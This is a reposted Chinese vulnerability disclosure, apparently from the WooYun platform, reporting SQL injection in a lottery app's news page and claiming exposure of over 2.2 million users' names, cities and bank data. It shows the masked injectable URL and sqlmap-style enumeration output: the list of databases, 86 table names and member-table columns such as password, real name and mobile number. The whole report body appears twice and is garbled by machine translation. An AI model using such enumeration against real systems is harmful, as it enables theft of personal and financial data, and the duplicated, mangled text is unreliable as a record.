APP安全之一彩票存在SQL注入(220W+用户信息泄露/姓名/城市/银行)
漏洞标题 APP安全之一彩票存在SQL注入(220W+用户信息泄露/姓名/城市/银行) 相关厂商 一彩票 漏洞作者 Exploit DB 提交时间 2016-04-30 12:40 公开时间 2016…
漏洞标题
APP安全一个彩票存在SQL注入(220W +用户信息泄露/名称/城市/银行)
相关制造商
彩票
漏洞作者
利用数据库
提交时间
2016-04-30 12: 40
公共时间
2016-06-19 19: 50
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
已提交给第三方合作机构(cncert National Internet Emergency Center)
标签标签
漏洞详细信息
http://**。**。**。**/news/newslist.php?categoryId=15
可用数据库[7]:
[*] bbs
[*] caiso
[*] information_schema
[*] mysql
[*] performance_schema
[*]测试
[*] tubiao
数据库: caiso
[86表]
+ ------------------------------ +
|帐户|
| accountlog |
| activity_activities |
| activity_activity_detail |
| admin_channel |
| admin_class |
| admin_permissions |
| admin_role |
| admin_role_function |
| admin_sendsomething_template |
| admin_syslogs |
| admin_user |
| admin_winprize |
|代理商|
| bankcardInfo |
| business_activity_partner |
| business_article |
| business_article_category |
| business_article_inlink |
| business_article_partner |
| business_back_money_request |
| business_chase |
| business_chaseitem |
| business_city_no |
| business_community |
| business_company |
| business_cps_day_report |
| business_customer |
| business_customer_commission |
| business_email |
| business_email_log |
| business_feedback |
| business_filedownlod |
| business_friendly_link |
| business_league |
| business_league_rank |
| business_match_arrange |
| business_match_history |
| business_match_mapping |
| business_match_team_mapping |
| business_mobile |
| business_odd |
| business_order |
| business_order_queue |
| business_order_temp |
| business_part |
| business_partner |
| business_pay |
| business_pay_out_request |
| business_payment_request |
| business_plan |
| business_plan_item |
| business_print_term |
| business_prize_level |
| business_recharge_gift |
| business_restricted |
| business_sms_log |
| business_sms_mo_log |
| business_sms_partner |
| business_soft_update |
| business_spread_channel |
| business_supplier |
| business_sys_account |
| business_sys_account_log |
| business_system_param |
| business_team |
| business_term |
| business_term_type_config |
| business_ticket |
| business_wallet |
| business_wallet_log |
| business_win_describe_order |
| business_win_describe_ticket |
| business_win_prize |
| business_you_hui_ma |
|会员|
| memberinfo |
| memberlog |
| membershare |
| mibaoinfo |
|赔率|
|点|
| pointlog |
Failure when receiving data from the peer
Customer_ip | varchar(255)|
Customer_type | int(11)|
|电子邮件| varchar(255)|
| email_accept | varchar(255)|
| id | bigint(20)|
| is_apply |位(1)|
| is_pass | int(11)|
| last_login_time | datetime |
| login_num | int(11)|
| mobile_no | varchar(255)|
| nick_name | varchar(255)|
|老| int(11)|
| open_id | varchar(255)|
|密码| varchar(255)|
| ploy_accur | bigint(20)|
| ploy_consumed | bigint(20)|
|省| varchar(255)|
|问题| varchar(255)|
| real_name | varchar(255)|
| reg_channel | int(11)|
| reg_source | int(11)|
| register_time | datetime |
|备注| varchar(255)|
| sms_accept | varchar(255)|
| sssuper_commission |小数(19,2)|
| sssuper_ratio |小数(19,2)|
| sssuperior | bigint(20)|
| ssuper_commission |小数(19,2)|
| ssuper_ratio |小数(19,2)|
| ssuperior_id | bigint(20)|
|状态| int(11)|
|支管| varchar(255)|
| super_commission |小数(19,2)|
| super_ratio |小数(19,2)|
| superior_id | bigint(20)|
| user3_id | varchar(255)|
| usr_type | int(11)|
| wake_up_email_num | int(11)|
| wallet_id | bigint(20)|
| yanzhenma | varchar(255)|
+ -------------------- + --------------- +
时间问题不会继续深入〜
漏洞证明:
修理计划:
版权声明:请注明出处Exploit DB @乌云
可用数据库[7]:
[*] bbs
[*] caiso
[*] information_schema
[*] mysql
[*] performance_schema
[*]测试
[*] tubiao
数据库: caiso
[86表]
+ ------------------------------ +
|帐户|
| accountlog |
| activity_activities |
| activity_activity_detail |
| admin_channel |
| admin_class |
| admin_permissions |
| admin_role |
| admin_role_function |
| admin_sendsomething_template |
| admin_syslogs |
| admin_user |
| admin_winprize |
|代理商|
| bankcardInfo |
| business_activity_partner |
| business_article |
| business_article_category |
| business_article_inlink |
| business_article_partner |
| business_back_money_request |
| business_chase |
| business_chaseitem |
| business_city_no |
| business_community |
| business_company |
| business_cps_day_report |
| business_customer |
| business_customer_commission |
| business_email |
| business_email_log |
| business_feedback |
| business_filedownlod |
| business_friendly_link |
| business_league |
| business_league_rank |
| business_match_arrange |
| business_match_history |
| business_match_mapping |
| business_match_team_mapping |
| business_mobile |
| business_odd |
| business_order |
| business_order_queue |
| business_order_temp |
| business_part |
| business_partner |
| business_pay |
| business_pay_out_request |
| business_payment_request |
| business_plan |
| business_plan_item |
| business_print_term |
| business_prize_level |
| business_recharge_gift |
| business_restricted |
| business_sms_log |
| business_sms_mo_log |
| business_sms_partner |
| business_soft_update |
| business_spread_channel |
| business_supplier |
| business_sys_account |
| business_sys_account_log |
| business_system_param |
| business_team |
| business_term |
| business_term_type_config |
| business_ticket |
| business_wallet |
| business_wallet_log |
| business_win_describe_order |
| business_win_describe_ticket |
| business_win_prize |
| business_you_hui_ma |
|会员|
| memberinfo |
| memberlog |
| membershare |
| mibaoinfo |
|赔率|
|点|
| pointlog |
Failure when receiving data from the peer
Customer_ip | varchar(255)|
Customer_type | int(11)|
|电子邮件| varchar(255)|
| email_accept | varchar(255)|
| id | bigint(20)|
| is_apply |位(1)|
| is_pass | int(11)|
| last_login_time | datetime |
| login_num | int(11)|
| mobile_no | varchar(255)|
| nick_name | varchar(255)|
|老| int(11)|
| open_id | varchar(255)|
|密码| varchar(255)|
| ploy_accur | bigint(20)|
| ploy_consumed | bigint(20)|
|省| varchar(255)|
|问题| varchar(255)|
| real_name | varchar(255)|
| reg_channel | int(11)|
| reg_source | int(11)|
| register_time | datetime |
|备注| varchar(255)|
| sms_accept | varchar(255)|
| sssuper_commission |小数(19,2)|
| sssuper_ratio |小数(19,2)|
| sssuperior | bigint(20)|
| ssuper_commission |小数(19,2)|
| ssuper_ratio |小数(19,2)|
| ssuperior_id | bigint(20)|
|状态| int(11)|
|支管| varchar(255)|
| super_commission |小数(19,2)|
| super_ratio |小数(19,2)|
| superior_id | bigint(20)|
| user3_id | varchar(255)|
| usr_type | int(11)|
| wake_up_email_num | int(11)|
| wallet_id | bigint(20)|
| yanzhenma | varchar(255)|
+ -------------------- + --------------- +
时间问题不会继续深入〜
漏洞证明:
修理计划:
版权声明:请注明出处Exploit DB @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 515 )
- 分类:黑客技术
